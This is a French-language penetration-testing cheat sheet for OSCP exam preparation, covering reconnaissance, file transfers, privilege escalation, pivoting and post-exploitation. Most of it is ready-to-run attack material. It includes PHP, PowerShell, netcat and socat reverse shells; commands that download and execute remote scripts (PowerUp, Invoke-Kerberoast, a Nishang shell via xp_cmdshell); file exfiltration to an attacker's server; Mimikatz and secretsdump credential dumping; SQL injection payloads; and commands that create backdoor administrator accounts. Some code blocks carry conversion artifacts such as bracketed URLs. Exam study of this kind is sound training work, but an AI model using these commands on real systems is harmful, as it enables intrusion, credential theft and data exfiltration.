
Feuille de triche complète de tests d'intrusion pour la préparation aux examens PWK/OSCP, couvrant l'escalade de privilèges, le cassage de mots de passe, la génération de charges utiles, la post-exploitation, le scan de ports, les attaques web et les techniques de reconnaissance.
JustTryHarder est une antisèche qui vous aidera tout au long du cours PWK et de l'examen OSCP.
(Inspiré de PayloadAllTheThings)
N'hésitez pas à soumettre une Pull Request et à laisser une étoile pour partager un peu d'amour si cela vous a aidé. 💖
Compatible Hacktoberfest ! Oui, nous acceptons les Pull Requests pour Hacktoberfest ! Assurez-vous qu'elles ne sont pas du spam et qu'elles contribuent réellement à ce dépôt. Merci et bon hacking !
Avertissement : Rien de ce qui suit ne contient de spoilers pour les laboratoires PWK / l'examen OSCP.
J'ai obtenu une grande partie de ces informations via d'autres dépôts Github, blogs, sites et plus encore. J'ai essayé de créditer autant que possible le créateur original. Si je ne vous ai pas crédité, veuillez me contacter sur Twitter : https://twitter.com/s1nfulz
ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
Le `TTL` peut être utilisé pour déterminer le système d'exploitation de l'hôte. Les trois différents types de TTL sont les suivants :
- **TTL=64** = \*nix – Le nombre de sauts ; donc si vous obtenez 61, il y a 3 sauts et c'est un périphérique \*nix. Très probablement Linux.
- **TTL=128** = Windows – Encore une fois, si le TTL est 127, le saut est de 1 et c'est une machine Windows.
- **TTL=254** = Solaris/AIX – Si le TTL est 250, le nombre de sauts est de 4 et c'est une machine Solaris.
## BOF (En cours)
(Les mauvais caractères typiques incluent : `0x00`, `0x0A`, `0x0D`)
- Fuzzing
- Trouver la position d'EIP
- Trouver les mauvais caractères
- Localiser `jmp esp`
- Générer une charge utile avec `msfvenom`
- Obtenir un shell inverse avec `netcat`
**Bonnes ressources BOF :**
- [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
- [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
- [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
- [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)
## Évasions / Échappements d'environnement
- [Pentest Partners - Breaking out of Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
- [SRA.io - SiteKiosk Breakout](https://sra.io/blog/sitekiosk-breakout/)
- [TrustedSec - Kiosk/POS Breakout Keys](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
- [Cognosec - Breaking out of Citrix Environment](https://cognosec.com/breaking-out-of-citrix-environment/)
- [NetSPI - Breaking out of Applications](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
- [NCC Group - Common Issues with Environment Breakouts (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
- [GracefulSecurity - Citrix Breakout](https://gracefulsecurity.com/citrix-breakout/)
## DNS - Transferts de zone```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## Transferts de fichiers
### Transfert SMB
Sur la machine victime (Windows) :```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Transfert avec Wget
Comment récupérer un ou plusieurs fichiers depuis l'hôte (dans un reverse shell).
**Configuration :** Placez le fichier que vous souhaitez transférer dans `/var/www/html/` et exécutez `service apache2 start`.
Exécutez sur le serveur distant :```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64) # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/) # <- for folder
```
### Transfert TFTP
(Comment transférer de Kali vers Windows).
**Avec MSF:**
Démarrez MSF avant ces étapes :
1. `use auxiliary/server/tftp`
2. `set TFTPROOT /usr/share/mimikatz/Win32/`
3. `run`
**Dans un terminal:**
4\. `tftp -i 10.10.10.10 GET mimikatz.exe`
### NetCat (Windows vers Kali)
1. **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2. **Linux:** `nc -nlvp 4444 > bank-account.zip`
### PowerShell
Session interactive:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
Sans session PowerShell interactive (Créer `wget.ps1`):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -> Linux)
**Hôte local :**
1. `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2. Transférez `encoded.b64` vers le serveur distant via `nc` ou autrement.
**Serveur distant - Linux :**
3\. `cat /path/to/encoded.b64 | base64 -d > exploit.py`
### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### Téléchargement de fichier HTTP (Exfiltration)
**1. Créer upload.php**
Créer dans le répertoire webroot de la machine attaquante (`/var/www/html` par défaut).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. Créer un répertoire**
Créez le répertoire de téléversement et définissez les autorisations appropriées pour autoriser le téléversement.```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. Télécharger un fichier**
Télécharger un fichier depuis la machine victime vers la machine attaquante avec PowerShell :```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting
- `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
- `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
- `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`
## LFI / RFI
**PHP Reverse Shell:**```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
```
**Injection de commandes:**```php
<?php echo shell_exec(whoami);?>
```
## MSSQL / SQLi
- `EXEC master..xp_cmdshell 'whoami';`
- `' exec master..xp_cmdshell 'whoami' --`
- [Aide-mémoire d'injection SQL OSCP-2](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md)
- [PentestMonkey Injection SQL](http://pentestmonkey.net/category/cheat-sheet/sql-injection)
## Craquage de mots de passe
**Hashcat**```bash
hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt
```
**John The Ripper**```bash
john --rules --wordlist=/path/to/your/wordlist.txt hash.txt
```
## Pulvérisation de mots de passe (CrackMapExec)```bash
cme smb 10.10.10.10 -u username -d domain -p password
```
## Génération de payloads
- [NETSEC - Création de payloads](https://netsec.ws/?p=331)
- [Aide-mémoire MsfVenom](https://www.google.com/search?q=http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)
- [Metasploit Unleashed Payloads](https://www.offensive-security.com/metasploit-unleashed/payloads/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
**Types:**
- Non-stagé : `netcat`
- Stagé : `multi/handler`
## PHP
- [Les différences entre exec(), shell\_exec, system() et passthru()](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)
## Élévation de privilèges - Linux
**Note:** Si GCC & wget sont installés, le système POURRAIT être vulnérable à une exploitation du noyau.
- [Exploits du noyau Linux](https://github.com/SecWiki/linux-kernel-exploits)
- [GTFObins - Sortir des shells restreints](https://gtfobins.github.io)
- Script helper GTFO : [https://github.com/dreadnaughtsec/gtfo](https://github.com/dreadnaughtsec/gtfo)
- [Suggereur d'exploits Linux](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
- [Suggereur d'exploits Linux 2](https://github.com/jondonas/linux-exploit-suggester-2)
- [Élévation de privilèges Linux de base](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
**Commandes d'énumération :**```bash
grep -Ri 'password' .
find / -perm –4000 2>/dev/null
find / -perm -u=s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
# (then ls -la, look for 777 file permissions)
```
**Binaire SUID personnalisé :** Nécessite l'exécution de code en tant qu'utilisateur cible. Exemple : mysql sys\_eval en tant que root.```c
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
int main(){
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
## Élévation de privilèges - Windows
- [Notions fondamentales sur l'élévation de privilèges Windows](http://www.fuzzysecurity.com/tutorials/16.html)
- [Guide d'élévation de privilèges Windows](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
- [Powerless - Outil d'énumération](https://github.com/M4ximuss/Powerless)
- [Atelier local d'élévation de privilèges](https://github.com/sagishahar/lpeworkshop)
- [Just Another Windows (Enum) Script / JAWS](https://github.com/411Hall/JAWS)
- [Watson](https://github.com/rasta-mouse/Watson)
- [Sherlock (Obsolète)](https://github.com/rasta-mouse/Sherlock)
- [Suggesteur d'exploits Windows](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
**Commandes :**
- `churrasco -d "net user /add <username> <password>"`
- `churrasco -d "net localgroup administrators <username> /add"`
- `churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"`
## Post-Exploitation
1. `Mimikatz.exe` (exécutez-le)
2. `privilege::debug`
3. `sekurlsa::logonpasswords`
## Redirection de ports
> **Local :** Transférer le port local vers l'hôte distant.
> Utilisez Local si vous avez un service en cours d'exécution sur une machine accessible depuis la machine distante, et que vous souhaitez y accéder directement depuis la machine locale.
>
> **Remote :** Transférer le port distant vers l'hôte local.
> Utilisez Remote si vous avez un service accessible depuis la machine locale, et que vous devez le rendre disponible sur la machine distante. Cela ouvre le socket d'écoute sur la machine où vous vous êtes connecté via SSH.
>
> **Dynamic :** Utiliser SOCKS.
> Dynamic est similaire à Local, mais côté client, il se comporte comme un proxy SOCKS. Utilisez-le si vous devez vous connecter avec un logiciel qui attend un transfert SOCKS.
### Chisel
**Système local :**```bash
./chisel server -p 8080 --reverse
```
**Victime:**```bash
./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234
```
### SSH
1. **Générez une paire de clés SSH** sur la machine servant de pivot pour protéger vos identifiants.
<!-- end list -->```bash
ssh-keygen
cat ~/.ssh/id_rsa.pub
```
2. **Copiez la clé publique**. Ajoutez cette valeur et l'adresse IP de la machine pivot au fichier `~/.ssh/authorized_keys` sur votre machine d'attaque (Kali) en utilisant la syntaxe ci-dessous.
<!-- end list -->```
from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]
```
3. **Assurez-vous que le service SSH est en cours d'exécution** sur votre machine d'attaque (Kali).
<!-- end list -->```bash
sudo service ssh start
```
4. **Initier un appel SSH** depuis la machine utilisée comme pivot et spécifier la clé privée `id_rsa` générée à l'étape 1.
<!-- end list -->```bash
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]
```
5. **Modifiez votre configuration proxychains** : `/etc/proxychains.conf`
<!-- end list -->```
socks4 127.0.0.1 1080
```
6. **Utilisez proxychains**. Lorsque vous scannez avec `nmap`, assurez-vous d'utiliser des scans TCP Connect.
<!-- end list -->```bash
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10
```
**Remarques supplémentaires :**
- `ssh [email protected] -R 1234:127.0.0.1:1234`
- `ssh -D 1337 -q -C -N -f [email protected]` ([Source](https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters))
## Proxy SOCKS (avec PowerShell)
**Local :**
- `vi /etc/proxychains.conf` -> `socks5 <ip> 9080`
- `Import-Module .\Invoke-SocksProxy.psm1`
- `Invoke-SocksProxy -bindPort 9080`
- `proxychains nmap -sT <ip>`
## Scan de ports
### TCP```bash
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
nmap -sT -p 22,80,110 -A
nmap -p- -iL ips.txt > TCP_Ports.txt
nc -v -n -z -w1 10.10.10.10 1-10000
nmap -p- -iL ips.txt > AllTCPPorts.txt
```
### UDP
(Peut prendre des heures, `netstat` est une meilleure alternative si vous avez un shell).```bash
nmap -sU --top-ports 10000
nmap -sT -sU -p 22,80,110 -A
nmap -sT -sU -p- --min-rate 2000
nmap -p- -sU -iL ips.txt > udp.txt
nmap -sU -sV -iL ips.txt > alludpports.txt
```
### Autres Protocoles
**SNMP:**
`nmap -p161 -sU -iL ips.txt > udp.txt`
**SSH:**
`nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt`
**SSL:**
`nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt`
**NMAP Bootstrap Report:**```bash
nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl
```
## Balayage Ping
### Linux (Lignes uniques)```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
fping -g 192.168.0.1/24
```
### Linux (Script)```bash
for i in `seq 1 255`
do
ping -c1 192.168.125.$i 2>/dev/null 1>&2
if [[ $? -eq 0 ]]
then
echo 192.168.125.$i is up
fi
done
```
### Windows (CMD)```cmd
for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.
```
### Windows (PowerShell)```powershell
$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * }
```
### Nmap```bash
nmap -sP 192.168.0.1-254
```
## Pivoting
- `sshuttle -r [email protected] 10.1.1.0/24`
## Remote Desktop
- `rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/`
- `xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore`
## Responder
- `responder -I tun0 -wrF`
- [Responder with NTLM Relay and Empire](https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html)
- [Practical Guide to NTLM Relaying](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
## Reverse Shells
**Linux:**
- [PentestMonkey - Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [Awansec - Reverse Shell](https://awansec.com/reverse-shell.html)
- [RevShells.com](https://www.revshells.com/)
**Windows:**
- [GitHub - Windows PHP Reverse Shell](https://github.com/Dhayalanb/windows-php-reverse-shell)
- `nc 10.10.10.10 4444 –e cmd.exe`
## Amélioration du shell
Source: [Ropnop Blog](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) & [HTB Forum](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
### Python
1. `python -c 'import pty;spawn("/bin/bash");'` OR `python3 -c 'import pty;spawn("/bin/bash");'`
2. Dans le shell inversé:
<!-- end list -->```bash
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
```
3. Dans Kali:
<!-- end list -->```bash
stty raw -echo
fg
```
4. Dans un reverse shell:
<!-- end list -->```bash
reset # (sometimes optional)
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols> # (optional)
```
### Utilisation de Socat
**Écouteur:**```bash
socat file:`tty`,raw,echo=0 tcp-listen:4444
```
**Victime:**```bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
### Perl
1. `perl -e 'exec "/bin/sh";'`
2. `perl: exec "/bin/sh";`
### Bash
`/bin/sh -i`
## Injection SQL (SQLmap)```bash
sqlmap -u "[http://example.com/test.php?test=test](http://example.com/test.php?test=test)" --level=5 --risk=3 --batch
```
## Afficher les ports d'écoute
**Linux netstat:**
`netstat -tulpn | grep LISTEN`
**FreeBSD/MacOS X netstat:**
`netstat -anp tcp | grep LISTEN`
`netstat -anp udp | grep LISTEN`
**OpenBSD netstat:**
`netstat -na -f inet | grep LISTEN`
`netstat -nat | grep LISTEN`
**Scan Nmap:**
`sudo nmap -sT -O localhost`
`sudo nmap -sU -O 192.168.2.13` (UDP)
`sudo nmap -sT -O 192.168.2.13` (TCP)
## SMB - Enumeration
- [0xdf - SMB Enumeration Checklist](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html)
- `smbmap -H 10.10.10.10`
- `smbclient -L 10.0.0.10`
- `smbclient //10.10.10.10/share$`
## SMB - Impacket
**Impacket's PSEXEC** (Après avoir créé un port forwarding distant) :```bash
/usr/share/doc/python-impacket/examples/psexec.py [email protected]
# Password: (password)
# [*] Trying protocol 445/SMB...
```
**Impacket's SMBServer** (Pour le transfert de fichiers) :
1. `cd /usr/share/windows-binaries`
2. `python /usr/share/doc/python-impacket/examples/smbserver.py a .`
3. `\\10.10.10.10\a\mimikatz.exe`
## Énumération SMTP
- [Commandes SMTP](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt)
## Injection ICMP
1. `ping -n 3 10.10.10.10`
2. `tcpdump -i tun0 icmp`
## VMware (ne pas passer en plein écran)
`systemctl restart open-vm-tools.service`
## Serveurs Web
- `python -m SimpleHTTPServer 80`
- `python3 -m http.server 80`
- `ngrok http "file:///C:\Users\sinfulz\Public Folder"`
- `php -S 0.0.0.0:80`
## Analyse Web
**GoBuster (Linux/Apache) :**```bash
gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
```
**GoBuster (Windows/IIS) :**```bash
gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
```
**Dirsearch (Linux/Apache):**```bash
python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
```
**Dirsearch (Windows/IIS):**```bash
python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50
```
**Autres GoBuster:**
- HTTP: `gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69`
- HTTPS: `gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69`
**Nikto:**
- HTTP: `nikto -h 10.10.10.10 -p 80`
- HTTPS: `nikto -h 10.10.10.10 -p 443`
**WFuzz:**```bash
wfuzz -u [http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00](http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00) -w /usr/share/wfuzz/wordlist/general/common.txt
```
## Shells Web
- [PHPBash](https://github.com/Arrexel/phpbash)
- [p0wny-shell](https://github.com/flozz/p0wny-shell)
## WordPress
- [Top Hat Sec - WP](https://forum.top-hat-sec.com/index.php?topic=5758.0)
## Framework Windows / PowerShell
**Contourner la politique d'exécution de PowerShell :**```powershell
powershell -ExecutionPolicy ByPass -File script.ps1
```
**Ressources:**
- [Nishang](https://github.com/samratashok/nishang)
- [Sherlock](https://github.com/rasta-mouse/Sherlock)
**PowerShell inversé:**
(Parfois, powershell ou echo peuvent être nécessaires devant la chaîne, ou des guillemets utilisés).```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
**PowerUp (depuis un serveur web local):**```powershell
echo IEX(New-Object Net.WebClient).DownloadString('[http://10.10.10.10:80/PowerUp.ps1](http://10.10.10.10:80/PowerUp.ps1)') | powershell -noprofile -
```
ou```powershell
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('[http://10.10.14.](http://10.10.14.)x/Whatever.ps1'); Invoke-Whatever"
```
**PowerShell inversé via MSSQL :**```sql
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"[http://10.10.10.10/Nishang-ReverseShell.ps1](http://10.10.10.10/Nishang-ReverseShell.ps1)\")
```
**Transfert de fichiers avec PowerShell :**```powershell
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')
```
## Commandes de post-exploitation Windows```cmd
WMIC USERACCOUNT LIST BRIEF
net user
net localgroup Users
net localgroup Administrators
net user USERNAME NEWPASS /add
net user "USER NAME" NEWPASS /add
net localgroup administrators USERNAME /add
```
## Répertoires inscriptibles
### Windows
(Source : [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md))
Les dossiers suivants sont par défaut accessibles en écriture par les utilisateurs normaux (varie selon la version du système d'exploitation).```
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```
### Linux
Pour trouver les répertoires accessibles en écriture par tout le monde sous Linux :```bash
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
```
## Liste des tâches à réaliser :
- [ ] Améliorer la lisibilité de l'aide-mémoire
- [ ] Remplir les sections vides
- [ ] Supprimer les sections inutiles
- [ ] Intégrer les fichiers du dépôt dans l'aide-mémoire
- [ ] Migrer vers GitBook
- [ ] Inclure des captures d'écran/gifs dans l'aide-mémoire si nécessaire
- [ ] Ajouter une table des matières
## Remerciements :
Merci à ces personnes qui ont inclus mon aide-mémoire sur leur site web/blog :
- [KhaoticDev Cheatsheets](https://khaoticdev.net/cheatsheets/#collections)
- [NCyberSec Facebook Post](https://www.facebook.com/ncybersec/posts/1541830509321001)
- [CyberG0100 Facebook Post](https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466)
- [r/CyberSpaceVN Reddit Post](https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat)
- [XN4K PWK Cheatsheet](https://xn4k.github.io/pentest/PWK-course-&-the-OSCP-Exam-Cheatsheet/)
- [OpenSourceLibs Pentesting Tools](https://opensourcelibs.com/libs/pentesting-tools)
- [GitMemory (brhannah)](https://gitmemory.com/brhannah)
- [BugBountyTips Blog](https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/)
- [PythonLang OSCP Category](https://pythonlang.dev/category/oscp/)